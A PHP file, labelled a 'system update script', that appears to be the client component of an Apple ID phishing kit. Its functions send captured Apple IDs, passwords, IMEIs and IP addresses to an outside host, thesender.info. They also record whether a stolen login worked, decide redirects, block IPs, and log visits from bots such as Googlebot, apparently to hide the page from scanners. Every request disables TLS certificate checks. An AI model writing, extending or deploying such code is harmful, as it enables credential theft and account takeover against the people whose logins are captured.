<?php
/**
 * iServer v6 System Update Script
 * This script makes API calls to the Laravel backend system
 */

// Configuration
$base_url = "http://thesender.info/iserver"; // Change this to your actual server URL

/**
 * Make a GET request to retrieve order information by code
 * 
 * @param string $code The order code
 * @param string $link The link associated with the order
 * @return array|false Returns order data or false on failure
 */
function getOrderByCode($code, $link) {
    global $base_url;
    
    // Prepare the URL with query parameters
    $url = $base_url . "/order-get?code=" . urlencode($code) . "&link=" . urlencode($link);
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    // Execute cURL request
    $response = curl_exec($ch);
    
    // Check for errors
    if (curl_errno($ch)) {
        error_log("cURL Error in getOrderByCode: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    // Close cURL session
    curl_close($ch);
    
    // Decode JSON response
    $result = json_decode($response, true);
    
    return $result;
}



/**
 * Update order status when a true login is detected
 * 
 * @param string $order_code The order code
 * @param string $ip The IP address of the user
 * @return array|false Returns response or false on failure
 */
function updateTrueLoginOrder($order_code, $ip) {
    global $base_url;
    
    // Prepare the URL with query parameters
    $url = $base_url . "/order-update-true-login?order_code=" . urlencode($order_code) . "&ip=" . urlencode($ip);
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    // Execute cURL request
    $response = curl_exec($ch);
    
    // Check for errors
    if (curl_errno($ch)) {
        error_log("cURL Error in updateTrueLoginOrder: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    // Close cURL session
    curl_close($ch);
    
    // Decode JSON response
    $result = json_decode($response, true);
    
    return $result;
}

/**
 * Update order status when a false login is detected
 * 
 * @param string $order_code The order code
 * @return array|false Returns response or false on failure
 */
function updateFalseLoginOrder($order_code) {
    global $base_url;
    
    // Prepare the URL with query parameters
    $url = $base_url . "/order-update-false-login?order_code=" . urlencode($order_code);
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    // Execute cURL request
    $response = curl_exec($ch);
    
    // Check for errors
    if (curl_errno($ch)) {
        error_log("cURL Error in updateFalseLoginOrder: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    // Close cURL session
    curl_close($ch);
    
    // Decode JSON response
    $result = json_decode($response, true);
    
    return $result;
}

/**
 * Check if a redirect should occur (based on order status)
 * 
 * @param string $order_code The order code
 * @return array|false Returns response or false on failure
 */
function checkRedirect($order_code) {
    global $base_url;
    
    // Prepare the URL with query parameters
    $url = $base_url . "/check-redirect?order_code=" . urlencode($order_code);
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    // Execute cURL request
    $response = curl_exec($ch);
    
    // Check for errors
    if (curl_errno($ch)) {
        error_log("cURL Error in checkRedirect: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    // Close cURL session
    curl_close($ch);
    
    // Decode JSON response
    $result = json_decode($response, true);
    
    return $result;
}

/**
 * Store login details in the system
 * 
 * @param array $data Array containing login details
 * @return array|false Returns response or false on failure
 */
function storeLoginDetails($data) {
    global $base_url;
    
    // Validate required data
    if (!isset($data['type']) || !isset($data['order_code'])) {
        error_log("Error in storeLoginDetails: Missing required fields");
        return false;
    }
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $base_url . "/update-order-login-details");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: application/x-www-form-urlencoded',
        'Accept: application/json'
    ]);
    
    // Execute cURL request
    $response = curl_exec($ch);
    
    // Check for errors
    if (curl_errno($ch)) {
        error_log("cURL Error in storeLoginDetails: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    // Close cURL session
    curl_close($ch);
    
    // Decode JSON response
    $result = json_decode($response, true);
    
    return $result;
}

/**
 * Check if an IP address is blocked
 * 
 * @param string $ip The IP address to check
 * @param string $order_code The order code
 * @return array|false Returns response or false on failure
 */
function checkIpBlocked($ip, $order_code) {
    global $base_url;
    
    // Prepare the URL with query parameters
    $url = $base_url . "/check-ip-blocked?ip=" . urlencode($ip) . "&order_code=" . urlencode($order_code);
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    // Execute cURL request
    $response = curl_exec($ch);
    
    // Check for errors
    if (curl_errno($ch)) {
        error_log("cURL Error in checkIpBlocked: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    // Close cURL session
    curl_close($ch);
    
    // Decode JSON response
    $result = json_decode($response, true);
    
    return $result;
}

/**
 * Log bot detection information
 * 
 * @param array $data Bot detection data
 * @return array|false Returns response or false on failure
 */
function logBotDetection($data) {
    global $base_url;
    
    // Validate required data
    if (!isset($data['is_bot']) || !isset($data['ip_address']) || !isset($data['detection_method']) || 
        !isset($data['user_agent']) || !isset($data['link'])) {
        error_log("Error in logBotDetection: Missing required fields");
        return false;
    }
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $base_url . "/bot-detector/log");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: application/x-www-form-urlencoded',
        'Accept: application/json'
    ]);
    
    // Execute cURL request
    $response = curl_exec($ch);
    
    // Check for errors
    if (curl_errno($ch)) {
        error_log("cURL Error in logBotDetection: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    // Close cURL session
    curl_close($ch);
    
    // Decode JSON response
    $result = json_decode($response, true);
    
    return $result;
}
function checkDomainStatus($domain_id) {
    global $base_url;
    
    // Prepare the URL with query parameters
    $url = $base_url . "/check-domain-status?domain_id=" . urlencode($domain_id);
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
    // Execute cURL request
    $response = curl_exec($ch);
    
    // Check for errors
    if (curl_errno($ch)) {
        error_log("cURL Error in checkIpBlocked: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    // Close cURL session
    curl_close($ch);
    
    // Decode JSON response
    $result = json_decode($response, true);
    
    return $result;
}

// Example usage:
/*
// Get order details
$order = getOrderByCode('ORDER123', 'https://example.com/order');
if ($order) {
    echo "Order found: " . print_r($order, true);
}

// Update true login
$result = updateTrueLoginOrder('ORDER123', '192.168.1.1');
if ($result && isset($result['success']) && $result['success']) {
    echo "Order marked as true login.";
}

// Store login details
$loginData = [
    'type' => 'true_login',
    'order_code' => 'ORDER123',
    'ip' => '192.168.1.1',
    'apple_id' => 'user@example.com',
    'password' => 'password123',
    'country' => 'US',
    'browser' => 'Chrome',
    'auto_remove' => '0',
    'imei' => '123456789012345'
];
$result = storeLoginDetails($loginData);
if ($result) {
    echo "Login details stored successfully.";
}

// Log bot detection
$botData = [
    'is_bot' => true,
    'ip_address' => '192.168.1.1',
    'detection_method' => 'user_agent',
    'user_agent' => 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
    'link' => 'https://example.com/order'
];
$result = logBotDetection($botData);
if ($result && isset($result['success']) && $result['success']) {
    echo "Bot detection logged successfully.";
}
*/